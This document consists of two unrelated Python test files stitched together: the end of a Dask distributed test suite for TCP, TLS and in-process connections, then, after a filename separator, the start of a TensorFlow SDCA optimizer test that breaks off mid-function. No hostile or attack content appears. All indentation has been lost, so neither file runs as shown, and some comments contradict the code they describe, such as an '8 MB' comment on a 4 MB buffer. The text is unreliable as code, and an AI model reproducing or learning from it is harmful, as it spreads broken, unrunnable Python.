ip, pid, suffix = loc.split("/")
assert ip == expected_ip
assert int(pid) == expected_pid
return checker
@pytest.mark.asyncio
async def test_default_client_server_ipv4():
# Default scheme is (currently) TCP
await check_client_server("127.0.0.1", tcp_eq("127.0.0.1"))
await check_client_server("127.0.0.1:3201", tcp_eq("127.0.0.1", 3201))
await check_client_server("0.0.0.0", tcp_eq("0.0.0.0"), tcp_eq(EXTERNAL_IP4))
await check_client_server(
"0.0.0.0:3202", tcp_eq("0.0.0.0", 3202), tcp_eq(EXTERNAL_IP4, 3202)
)
# IPv4 is preferred for the bound address
await check_client_server("", tcp_eq("0.0.0.0"), tcp_eq(EXTERNAL_IP4))
await check_client_server(
":3203", tcp_eq("0.0.0.0", 3203), tcp_eq(EXTERNAL_IP4, 3203)
)
@requires_ipv6
@pytest.mark.asyncio
async def test_default_client_server_ipv6():
await check_client_server("[::1]", tcp_eq("::1"))
await check_client_server("[::1]:3211", tcp_eq("::1", 3211))
await check_client_server("[::]", tcp_eq("::"), tcp_eq(EXTERNAL_IP6))
await check_client_server(
"[::]:3212", tcp_eq("::", 3212), tcp_eq(EXTERNAL_IP6, 3212)
)
@pytest.mark.asyncio
async def test_tcp_client_server_ipv4():
await check_client_server("tcp://127.0.0.1", tcp_eq("127.0.0.1"))
await check_client_server("tcp://127.0.0.1:3221", tcp_eq("127.0.0.1", 3221))
await check_client_server("tcp://0.0.0.0", tcp_eq("0.0.0.0"), tcp_eq(EXTERNAL_IP4))
await check_client_server(
"tcp://0.0.0.0:3222", tcp_eq("0.0.0.0", 3222), tcp_eq(EXTERNAL_IP4, 3222)
)
await check_client_server("tcp://", tcp_eq("0.0.0.0"), tcp_eq(EXTERNAL_IP4))
await check_client_server(
"tcp://:3223", tcp_eq("0.0.0.0", 3223), tcp_eq(EXTERNAL_IP4, 3223)
)
@requires_ipv6
@pytest.mark.asyncio
async def test_tcp_client_server_ipv6():
await check_client_server("tcp://[::1]", tcp_eq("::1"))
await check_client_server("tcp://[::1]:3231", tcp_eq("::1", 3231))
await check_client_server("tcp://[::]", tcp_eq("::"), tcp_eq(EXTERNAL_IP6))
await check_client_server(
"tcp://[::]:3232", tcp_eq("::", 3232), tcp_eq(EXTERNAL_IP6, 3232)
)
@pytest.mark.asyncio
async def test_tls_client_server_ipv4():
await check_client_server("tls://127.0.0.1", tls_eq("127.0.0.1"), **tls_kwargs)
await check_client_server(
"tls://127.0.0.1:3221", tls_eq("127.0.0.1", 3221), **tls_kwargs
)
await check_client_server(
"tls://", tls_eq("0.0.0.0"), tls_eq(EXTERNAL_IP4), **tls_kwargs
)
@requires_ipv6
@pytest.mark.asyncio
async def test_tls_client_server_ipv6():
await check_client_server("tls://[::1]", tls_eq("::1"), **tls_kwargs)
@pytest.mark.asyncio
async def test_inproc_client_server():
await check_client_server("inproc://", inproc_check())
await check_client_server(inproc.new_address(), inproc_check())
#
# TLS certificate handling
#
@pytest.mark.asyncio
async def test_tls_reject_certificate():
cli_ctx = get_client_ssl_context()
serv_ctx = get_server_ssl_context()
# These certs are not signed by our test CA
bad_cert_key = ("tls-self-signed-cert.pem", "tls-self-signed-key.pem")
bad_cli_ctx = get_client_ssl_context(*bad_cert_key)
bad_serv_ctx = get_server_ssl_context(*bad_cert_key)
async def handle_comm(comm):
scheme, loc = parse_address(comm.peer_address)
assert scheme == "tls"
await comm.close()
# Listener refuses a connector not signed by the CA
listener = await listen("tls://", handle_comm, ssl_context=serv_ctx)
with pytest.raises(EnvironmentError) as excinfo:
comm = await connect(
listener.contact_address, timeout=0.5, ssl_context=bad_cli_ctx
)
await comm.write({"x": "foo"}) # TODO: why is this necessary in Tornado 6 ?
if os.name != "nt":
try:
# See https://serverfault.com/questions/793260/what-does-tlsv1-alert-unknown-ca-mean
# assert "unknown ca" in str(excinfo.value)
pass
except AssertionError:
if os.name == "nt":
assert "An existing connection was forcibly closed" in str(
excinfo.value
)
else:
raise
# Sanity check
comm = await connect(listener.contact_address, timeout=2, ssl_context=cli_ctx)
await comm.close()
# Connector refuses a listener not signed by the CA
listener = await listen("tls://", handle_comm, ssl_context=bad_serv_ctx)
with pytest.raises(EnvironmentError) as excinfo:
await connect(listener.contact_address, timeout=2, ssl_context=cli_ctx)
assert "certificate verify failed" in str(excinfo.value.__cause__)
#
# Test communication closing
#
async def check_comm_closed_implicit(addr, delay=None, listen_args={}, connect_args={}):
async def handle_comm(comm):
await comm.close()
listener = await listen(addr, handle_comm, **listen_args)
comm = await connect(listener.contact_address, **connect_args)
with pytest.raises(CommClosedError):
await comm.write({})
await comm.read()
comm = await connect(listener.contact_address, **connect_args)
with pytest.raises(CommClosedError):
await comm.read()
@pytest.mark.asyncio
async def test_tcp_comm_closed_implicit():
await check_comm_closed_implicit("tcp://127.0.0.1")
@pytest.mark.asyncio
async def test_tls_comm_closed_implicit():
await check_comm_closed_implicit("tls://127.0.0.1", **tls_kwargs)
@pytest.mark.asyncio
async def test_inproc_comm_closed_implicit():
await check_comm_closed_implicit(inproc.new_address())
async def check_comm_closed_explicit(addr, listen_args={}, connect_args={}):
a, b = await get_comm_pair(addr, listen_args=listen_args, connect_args=connect_args)
a_read = a.read()
b_read = b.read()
await a.close()
# In-flight reads should abort with CommClosedError
with pytest.raises(CommClosedError):
await a_read
with pytest.raises(CommClosedError):
await b_read
# New reads as well
with pytest.raises(CommClosedError):
await a.read()
with pytest.raises(CommClosedError):
await b.read()
# And writes
with pytest.raises(CommClosedError):
await a.write({})
with pytest.raises(CommClosedError):
await b.write({})
await b.close()
@pytest.mark.asyncio
async def test_tcp_comm_closed_explicit():
await check_comm_closed_explicit("tcp://127.0.0.1")
@pytest.mark.asyncio
async def test_tls_comm_closed_explicit():
await check_comm_closed_explicit("tls://127.0.0.1", **tls_kwargs)
@pytest.mark.asyncio
async def test_inproc_comm_closed_explicit():
await check_comm_closed_explicit(inproc.new_address())
@pytest.mark.asyncio
async def test_inproc_comm_closed_explicit_2():
listener_errors = []
async def handle_comm(comm):
# Wait
try:
await comm.read()
except CommClosedError:
assert comm.closed()
listener_errors.append(True)
else:
await comm.close()
listener = await listen("inproc://", handle_comm)
comm = await connect(listener.contact_address)
await comm.close()
assert comm.closed()
start = time()
while len(listener_errors) < 1:
assert time() < start + 1
await asyncio.sleep(0.01)
assert len(listener_errors) == 1
with pytest.raises(CommClosedError):
await comm.read()
with pytest.raises(CommClosedError):
await comm.write("foo")
comm = await connect(listener.contact_address)
await comm.write("foo")
with pytest.raises(CommClosedError):
await comm.read()
with pytest.raises(CommClosedError):
await comm.write("foo")
assert comm.closed()
comm = await connect(listener.contact_address)
await comm.write("foo")
start = time()
while not comm.closed():
await asyncio.sleep(0.01)
assert time() < start + 2
await comm.close()
await comm.close()
@pytest.mark.asyncio
async def test_comm_closed_on_buffer_error():
# Internal errors from comm.stream.write, such as
# BufferError should lead to the stream being closed
# and not re-used. See GitHub #4133
reader, writer = await get_tcp_comm_pair()
def _write(data):
raise BufferError
writer.stream.write = _write
with pytest.raises(BufferError):
await writer.write("x")
assert writer.stream is None
await reader.close()
await writer.close()
#
# Various stress tests
#
async def echo(comm):
message = await comm.read()
await comm.write(message)
@pytest.mark.asyncio
async def test_retry_connect(monkeypatch):
async def echo(comm):
message = await comm.read()
await comm.write(message)
class UnreliableConnector(TCPConnector):
def __init__(self):
self.num_failures = 2
self.failures = 0
super().__init__()
async def connect(self, address, deserialize=True, **connection_args):
if self.failures > self.num_failures:
return await super().connect(address, deserialize, **connection_args)
else:
self.failures += 1
raise OSError()
class UnreliableBackend(TCPBackend):
_connector_class = UnreliableConnector
monkeypatch.setitem(backends, "tcp", UnreliableBackend())
listener = await listen("tcp://127.0.0.1:1234", echo)
try:
comm = await connect(listener.contact_address)
await comm.write(b"test")
msg = await comm.read()
assert msg == b"test"
finally:
listener.stop()
@pytest.mark.asyncio
async def test_handshake_slow_comm(monkeypatch):
class SlowComm(TCP):
def __init__(self, *args, delay_in_comm=0.5, **kwargs):
super().__init__(*args, **kwargs)
self.delay_in_comm = delay_in_comm
async def read(self, *args, **kwargs):
await asyncio.sleep(self.delay_in_comm)
return await super().read(*args, **kwargs)
async def write(self, *args, **kwargs):
await asyncio.sleep(self.delay_in_comm)
res = await super(type(self), self).write(*args, **kwargs)
return res
class SlowConnector(TCPConnector):
comm_class = SlowComm
class SlowBackend(TCPBackend):
_connector_class = SlowConnector
monkeypatch.setitem(backends, "tcp", SlowBackend())
listener = await listen("tcp://127.0.0.1:1234", echo)
try:
comm = await connect(listener.contact_address)
await comm.write(b"test")
msg = await comm.read()
assert msg == b"test"
import dask
with dask.config.set({"distributed.comm.timeouts.connect": "100ms"}):
with pytest.raises(
IOError, match="Timed out during handshake while connecting to"
):
await connect(listener.contact_address)
finally:
listener.stop()
async def check_connect_timeout(addr):
t1 = time()
with pytest.raises(IOError):
await connect(addr, timeout=0.15)
dt = time() - t1
assert 1 >= dt >= 0.1
@pytest.mark.asyncio
async def test_tcp_connect_timeout():
await check_connect_timeout("tcp://127.0.0.1:44444")
@pytest.mark.asyncio
async def test_inproc_connect_timeout():
await check_connect_timeout(inproc.new_address())
async def check_many_listeners(addr):
async def handle_comm(comm):
pass
listeners = []
N = 100
for i in range(N):
listener = await listen(addr, handle_comm)
listeners.append(listener)
assert len({l.listen_address for l in listeners}) == N
assert len({l.contact_address for l in listeners}) == N
for listener in listeners:
listener.stop()
@pytest.mark.asyncio
async def test_tcp_many_listeners():
await check_many_listeners("tcp://127.0.0.1")
await check_many_listeners("tcp://0.0.0.0")
await check_many_listeners("tcp://")
@pytest.mark.asyncio
async def test_inproc_many_listeners():
await check_many_listeners("inproc://")
#
# Test deserialization
#
async def check_listener_deserialize(addr, deserialize, in_value, check_out):
q = asyncio.Queue()
async def handle_comm(comm):
msg = await comm.read()
q.put_nowait(msg)
await comm.close()
async with listen(addr, handle_comm, deserialize=deserialize) as listener:
comm = await connect(listener.contact_address)
await comm.write(in_value)
out_value = await q.get()
check_out(out_value)
await comm.close()
async def check_connector_deserialize(addr, deserialize, in_value, check_out):
done = asyncio.Event()
async def handle_comm(comm):
await comm.write(in_value)
await done.wait()
await comm.close()
async with listen(addr, handle_comm) as listener:
comm = await connect(listener.contact_address, deserialize=deserialize)
out_value = await comm.read()
done.set()
await comm.close()
check_out(out_value)
async def check_deserialize(addr):
"""
Check the "deserialize" flag on connect() and listen().
"""
# Test with Serialize and Serialized objects
msg = {
"op": "update",
"x": b"abc",
"to_ser": [to_serialize(123)],
"ser": Serialized(*serialize(456)),
}
msg_orig = msg.copy()
def check_out_false(out_value):
# Check output with deserialize=False
out_value = out_value.copy() # in case transport passed the object as-is
to_ser = out_value.pop("to_ser")
ser = out_value.pop("ser")
expected_msg = msg_orig.copy()
del expected_msg["ser"]
del expected_msg["to_ser"]
assert out_value == expected_msg
assert isinstance(ser, Serialized)
assert deserialize(ser.header, ser.frames) == 456
assert isinstance(to_ser, (tuple, list)) and len(to_ser) == 1
(to_ser,) = to_ser
# The to_serialize() value could have been actually serialized
# or not (it's a transport-specific optimization)
if isinstance(to_ser, Serialized):
assert deserialize(to_ser.header, to_ser.frames) == 123
else:
assert to_ser == to_serialize(123)
def check_out_true(out_value):
# Check output with deserialize=True
expected_msg = msg.copy()
expected_msg["ser"] = 456
expected_msg["to_ser"] = [123]
# Notice, we allow "to_ser" to be a tuple or a list
assert list(out_value.pop("to_ser")) == expected_msg.pop("to_ser")
assert out_value == expected_msg
await check_listener_deserialize(addr, False, msg, check_out_false)
await check_connector_deserialize(addr, False, msg, check_out_false)
await check_listener_deserialize(addr, True, msg, check_out_true)
await check_connector_deserialize(addr, True, msg, check_out_true)
# Test with long bytestrings, large enough to be transferred
# as a separate payload
# TODO: currently bytestrings are not transferred as a separate payload
_uncompressible = os.urandom(1024 ** 2) * 4 # end size: 8 MB
msg = {
"op": "update",
"x": _uncompressible,
"to_ser": (to_serialize(_uncompressible),),
"ser": Serialized(*serialize(_uncompressible)),
}
msg_orig = msg.copy()
def check_out(deserialize_flag, out_value):
# Check output with deserialize=False
assert sorted(out_value) == sorted(msg_orig)
out_value = out_value.copy() # in case transport passed the object as-is
to_ser = out_value.pop("to_ser")
ser = out_value.pop("ser")
expected_msg = msg_orig.copy()
del expected_msg["ser"]
del expected_msg["to_ser"]
assert out_value == expected_msg
if deserialize_flag:
assert isinstance(ser, (bytes, bytearray))
assert bytes(ser) == _uncompressible
else:
assert isinstance(ser, Serialized)
assert deserialize(ser.header, ser.frames) == _uncompressible
assert isinstance(to_ser, tuple) and len(to_ser) == 1
(to_ser,) = to_ser
# The to_serialize() value could have been actually serialized
# or not (it's a transport-specific optimization)
if isinstance(to_ser, Serialized):
assert deserialize(to_ser.header, to_ser.frames) == _uncompressible
else:
assert to_ser == to_serialize(_uncompressible)
await check_listener_deserialize(addr, False, msg, partial(check_out, False))
await check_connector_deserialize(addr, False, msg, partial(check_out, False))
await check_listener_deserialize(addr, True, msg, partial(check_out, True))
await check_connector_deserialize(addr, True, msg, partial(check_out, True))
@pytest.mark.flaky(reruns=10, reruns_delay=5, condition=WINDOWS)
@pytest.mark.asyncio
async def test_tcp_deserialize():
await check_deserialize("tcp://")
@pytest.mark.asyncio
async def test_inproc_deserialize():
await check_deserialize("inproc://")
async def check_deserialize_roundtrip(addr):
"""
Sanity check round-tripping with "deserialize" on and off.
"""
# Test with long bytestrings, large enough to be transferred
# as a separate payload
_uncompressible = os.urandom(1024 ** 2) * 4 # end size: 4 MB
msg = {
"op": "update",
"x": _uncompressible,
"to_ser": [to_serialize(_uncompressible)],
"ser": Serialized(*serialize(_uncompressible)),
}
for should_deserialize in (True, False):
a, b = await get_comm_pair(addr, deserialize=should_deserialize)
await a.write(msg)
got = await b.read()
await b.write(got)
got = await a.read()
assert sorted(got) == sorted(msg)
for k in ("op", "x"):
assert got[k] == msg[k]
if should_deserialize:
assert isinstance(got["to_ser"][0], (bytes, bytearray))
assert isinstance(got["ser"], (bytes, bytearray))
else:
assert isinstance(got["to_ser"][0], (to_serialize, Serialized))
assert isinstance(got["ser"], Serialized)
@pytest.mark.asyncio
async def test_inproc_deserialize_roundtrip():
await check_deserialize_roundtrip("inproc://")
@pytest.mark.asyncio
async def test_tcp_deserialize_roundtrip():
await check_deserialize_roundtrip("tcp://")
def _raise_eoferror():
raise EOFError
class _EOFRaising:
def __reduce__(self):
return _raise_eoferror, ()
async def check_deserialize_eoferror(addr):
"""
EOFError when deserializing should close the comm.
"""
async def handle_comm(comm):
await comm.write({"data": to_serialize(_EOFRaising())})
with pytest.raises(CommClosedError):
await comm.read()
async with listen(addr, handle_comm) as listener:
comm = await connect(listener.contact_address, deserialize=deserialize)
with pytest.raises(CommClosedError):
await comm.read()
@pytest.mark.asyncio
async def test_tcp_deserialize_eoferror():
await check_deserialize_eoferror("tcp://")
#
# Test various properties
#
async def check_repr(a, b):
assert "closed" not in repr(a)
assert "closed" not in repr(b)
await a.close()
assert "closed" in repr(a)
await b.close()
assert "closed" in repr(b)
@pytest.mark.asyncio
async def test_tcp_repr():
a, b = await get_tcp_comm_pair()
assert a.local_address in repr(b)
assert b.local_address in repr(a)
await check_repr(a, b)
@pytest.mark.asyncio
async def test_tls_repr():
a, b = await get_tls_comm_pair()
assert a.local_address in repr(b)
assert b.local_address in repr(a)
await check_repr(a, b)
@pytest.mark.asyncio
async def test_inproc_repr():
a, b = await get_inproc_comm_pair()
assert a.local_address in repr(b)
assert b.local_address in repr(a)
await check_repr(a, b)
async def check_addresses(a, b):
assert a.peer_address == b.local_address
assert a.local_address == b.peer_address
a.abort()
b.abort()
@pytest.mark.asyncio
async def test_tcp_adresses():
a, b = await get_tcp_comm_pair()
await check_addresses(a, b)
@pytest.mark.asyncio
async def test_tls_adresses():
a, b = await get_tls_comm_pair()
await check_addresses(a, b)
@pytest.mark.asyncio
async def test_inproc_adresses():
a, b = await get_inproc_comm_pair()
await check_addresses(a, b)
def test_register_backend_entrypoint():
# Code adapted from pandas backend entry point testing
# https://github.com/pandas-dev/pandas/blob/2470690b9f0826a8feb426927694fa3500c3e8d2/pandas/tests/plotting/test_backend.py#L50-L76
dist = pkg_resources.get_distribution("distributed")
if dist.module_path not in distributed.__file__:
# We are running from a non-installed distributed, and this test is invalid
pytest.skip("Testing a non-installed distributed")
mod = types.ModuleType("dask_udp")
mod.UDPBackend = lambda: 1
sys.modules[mod.__name__] = mod
entry_point_name = "distributed.comm.backends"
backends_entry_map = pkg_resources.get_entry_map("distributed")
if entry_point_name not in backends_entry_map:
backends_entry_map[entry_point_name] = dict()
backends_entry_map[entry_point_name]["udp"] = pkg_resources.EntryPoint(
"udp", mod.__name__, attrs=["UDPBackend"], dist=dist
)
# The require is disabled here since particularly unit tests may install
# dirty or dev versions which are conflicting with backend entrypoints if
# they are demanding for exact, stable versions. This should not fail the
# test
result = get_backend("udp", require=False)
assert result == 1
|
sdca_ops_test.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SdcaModel."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
from tensorflow.core.example import example_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_sdca_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import googletest
from tensorflow_estimator.python.estimator.canned.linear_optimizer.python.utils.sdca_ops import _SDCAModel
from tensorflow_estimator.python.estimator.canned.linear_optimizer.python.utils.sdca_ops import _SparseFeatureColumn
_MAX_ITERATIONS = 100
_SHARD_NUMBERS = [None, 1, 3]
_NUM_LOSS_PARTITIONS = [4]
def make_example_proto(feature_dict, target, value=1.0):
e = example_pb2.Example()
features = e.features
features.feature['target'].float_list.value.append(target)
for key, values in feature_dict.items():
features.feature[key + '_indices'].int64_list.value.extend(values)
features.feature[key + '_values'].float_list.value.extend([value] *
len(values))
return e
def make_example_dict(example_protos, example_weights):
def parse_examples(example_protos):
features = {
'target':
parsing_ops.FixedLenFeature(
shape=[1], dtype=dtypes.float32, default_value=0),
'age_indices':
parsing_ops.VarLenFeature(dtype=dtypes.int64),
'age_values':
parsing_ops.VarLenFeature(dtype=dtypes.float32),
'gender_indices':
parsing_ops.VarLenFeature(dtype=dtypes.int64),
'gender_values':
parsing_ops.VarLenFeature(dtype=dtypes.float32)
}
return parsing_ops.parse_example(
[e.SerializeToString() for e in example_protos], features)
parsed = parse_examples(example_protos)
sparse_features = [
_SparseFeatureColumn(
array_ops.reshape(
array_ops.split(
value=parsed['age_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
array_ops.reshape(parsed['age_indices'].values, [-1]),
array_ops.reshape(parsed['age_values'].values, [-1])),
_SparseFeatureColumn(
array_ops.reshape(
array_ops.split(
value=parsed['gender_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
array_ops.reshape(parsed['gender_indices'].values, [-1]),
array_ops.reshape(parsed['gender_values'].values, [-1]))
]
return dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=example_weights,
example_labels=array_ops.reshape(parsed['target'], [-1]),
example_ids=['%d' % i for i in range(0, len(example_protos))])
def make_random_examples_and_variables_dicts(num_examples, dim, num_non_zero):
random.seed(1)
sparse_features = [
_SparseFeatureColumn(
[i for i in range(num_examples) for _ in range(num_non_zero)], [
i for _ in range(num_examples)
for i in random.sample(range(dim), num_non_zero)
],
[num_non_zero**(-0.5) for _ in range(num_examples * num_non_zero)])
]
examples_dict = dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=[random.random() for _ in range(num_examples)],
example_labels=[
1. if random.random() > 0.5 else 0. for _ in range(num_examples)
],
example_ids=[str(i) for i in range(num_examples)])
weights = variables_lib.VariableV1(
array_ops.zeros([dim], dtype=dtypes.float32))
variables_dict = dict(
sparse_features_weights=[weights],
dense_features_weights=[])
return examples_dict, variables_dict
def make_variable_dict(max_age, max_gender, num_shards=None, partitioned=False):
# TODO(dbaylor): Figure out how to derive max_age & max_gender from
# examples_dict.
partitioner = None
if partitioned:
partitioner = partitioned_variables.fixed_size_partitioner(num_shards=2,
axis=0)
with variable_scope.variable_scope(
name_or_scope=('variables/shard_{}'.format(num_shards)
if num_shards else 'variables'),
partitioner=partitioner):
age_weights = variable_scope.get_variable(
name='age',
initializer=array_ops.zeros([max_age + 1], dtype=dtypes.float32))
gender_weights = variable_scope.get_variable(
name='gender',
initializer=array_ops.zeros([max_gender + 1], dtype=dtypes.float32))
return dict(
sparse_features_weights=[age_weights, gender_weights],
dense_features_weights=[])
def make_dense_examples_and_variables_dicts(dense_features_values, weights,
labels):
"""Creates examples and variables dictionaries for dense features.
Variables shapes are inferred from the list of dense feature values passed as
argument.
Args:
dense_features_values: The values of the dense features
weights: The example weights.
labels: The example labels.
Returns:
One dictionary for the examples and one for the variables.
"""
dense_tensors = []
dense_weights = []
for dense_feature in dense_features_values:
dense_tensor = ops.convert_to_tensor(dense_feature, dtype=dtypes.float32)
check_shape_op = control_flow_ops.Assert(
math_ops.less_equal(array_ops.rank(dense_tensor), 2),
['dense_tensor shape must be [batch_size, dimension] or [batch_size]'])
# Reshape to [batch_size, dense_column_dimension].
with ops.control_dependencies([check_shape_op]):
dense_tensor = array_ops.reshape(
dense_tensor, [dense_tensor.get_shape().as_list()[0], -1])
dense_tensors.append(dense_tensor)
# Add variables of shape [feature_column_dimension].
dense_weights.append(
variables_lib.VariableV1(
array_ops.zeros(
[dense_tensor.get_shape().as_list()[1]], dtype=dtypes.float32)))
examples_dict = dict(
sparse_features=[],
dense_features=dense_tensors,
example_weights=weights,
example_labels=labels,
example_ids=['%d' % i for i in range(0, len(labels))])
variables_dict = dict(
sparse_features_weights=[], dense_features_weights=dense_weights)
return examples_dict, variables_dict
def get_binary_predictions_for_logistic(predictions, cutoff=0.5):
return math_ops.cast(
math_ops.greater_equal(predictions,
array_ops.ones_like(predictions) * cutoff),
dtype=dtypes.int32)
def get_binary_predictions_for_hinge(predictions):
return math_ops.cast(
math_ops.greater_equal(predictions, array_ops.zeros_like(predictions)),
dtype=dtypes.int32)
# TODO(pmol): Refactor tests to avoid repetition of boilerplate code.
class _SDCAModelTest(TensorFlowTestCase):
"""Base SDCA optimizer test class for any loss type."""
def _single_threaded_test_session(self):
config = config_pb2.ConfigProto(
inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
return self.test_session(use_gpu=False, config=config)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithLogisticLossTest(_SDCAModelTest):
"""SDCA optimizer test class for logistic loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testPartitionedPrimals(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards, partitioned=True)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSomePartitionedPrimals(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [0],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
# Explicitly make age a [1]-shaped Variable (which cannot be
# partitioned), while making gender a PartitionedVariable.
age_weights = variables_lib.VariableV1(
array_ops.zeros([1], dtype=dtypes.float32))
with variable_scope.variable_scope(
name_or_scope=('variables/shard_{}'.format(num_shards)
if num_shards else 'variables'),
partitioner=partitioned_variables.fixed_size_partitioner(
num_shards=2, axis=0)):
gender_weights = variable_scope.get_variable(
name='gender',
initializer=array_ops.zeros([2], dtype=dtypes.float32))
variables = dict(
sparse_features_weights=[age_weights, gender_weights],
dense_features_weights=[])
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.593014 is the unregularized_loss at that optimum.
self.assertAllClose(0.512591, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.593014, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSparseRandom(self):
dim = 20
num_examples = 1000
# Number of non-zero features per example.
non_zeros = 10
# Setup test data.
with self._single_threaded_test_session():
examples, variables = make_random_examples_and_variables_dicts(
num_examples, dim, non_zeros)
options = dict(
symmetric_l2_regularization=.1,
symmetric_l1_regularization=0,
num_table_shards=1,
adaptive=False,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
for _ in range(10):
train_op.run()
lr.update_weights(train_op).run()
self.assertNear(0.0, lr.approximate_duality_gap().eval(), err=1e-2)
def testSparseDuplicate(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0] * 5,
'gender': [0] * 5
}, 0),
make_example_proto({
'age': [1] * 5,
'gender': [1] * 5
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'Duplicate'):
train_op.run()
def testDistributedSimple(self):
# Distributed SDCA may not converge if the workers update concurrently the
# same example. In this test the examples are partitioned across workers.
# The examples are the same for all workers, just the example_ids are
# different.
